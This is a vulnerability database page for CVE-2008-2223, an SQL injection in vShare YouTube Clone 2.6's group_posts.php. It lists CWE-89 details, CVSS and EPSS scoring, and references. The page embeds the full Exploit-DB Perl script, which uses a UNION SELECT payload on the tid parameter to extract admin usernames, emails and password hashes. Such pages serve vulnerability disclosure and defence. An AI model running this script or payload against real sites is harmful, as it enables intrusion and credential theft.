CVE-2008-2223 : Detail

CVE-2008-2223

SQL Injection
A03-Injection
0.18%V3
Network
2008-05-14
16h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in group_posts.php in vShare YouTube Clone 2.6 allows remote attackers to execute arbitrary SQL commands via the tid parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5565

Publication date : 2008-05-07 22h00 +00:00
Author : Saime
EDB Verified : Yes

#!/usr/bin/perl # Coded by: Saime # vShare Youtube Clone v2.6 (group_posts.php tid) Remote SQL Injection # Author: Saime # URL: http://www.buyscripts.in # Price: $10.00 # Date: 8/05/2008 # Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed and everyone else I forgot! # Site: http://h4ck-y0u.org use LWP; $site = @ARGV[0]; $ua = LWP::UserAgent->new; my $injection = 'group_posts.php?tid=1+union+select+1,2,3,4,concat(username,0x3a,email,0x3a,pwd),6,7+from+signup+limit+0,1--'; if (@ARGV < 1) {&usage;} else { &exploit( ) } sub exploit ( ) { print "[+] Exploiting...\n"; $passres = $ua->get("http://$site/$injection"); $exploitcon = $passres->content; if ($exploitcon =~ m/<b>Topic:<\/b>(.*)<b>(.*):(.*):([a-f0-9]{32})<\/b><br \/>/gmi){ $pass = $4; $admin = $2; $email = $3; print "[+] Admin Password: $pass\n"; print "[+] Admin Username: $admin\n"; print "[+] Admin Email: $email\n"; } else { print "[-] Unable To Get The Password...\n"; exit(0); } } sub usage ( ) { print "Usage: ./vshare.pl [host]\n"; print "Example: ./vshare.pl www.site.com\n"; exit(0); } # milw0rm.com [2008-05-08]

Products Mentioned

Configuraton 0

Buyscripts>>Vshare_youtube_clone >> Version 2.6

    References

    http://secunia.com/advisories/30144
    Tags : third-party-advisory, x_refsource_SECUNIA
    https://www.exploit-db.com/exploits/5565
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securityfocus.com/bid/29114
    Tags : vdb-entry, x_refsource_BID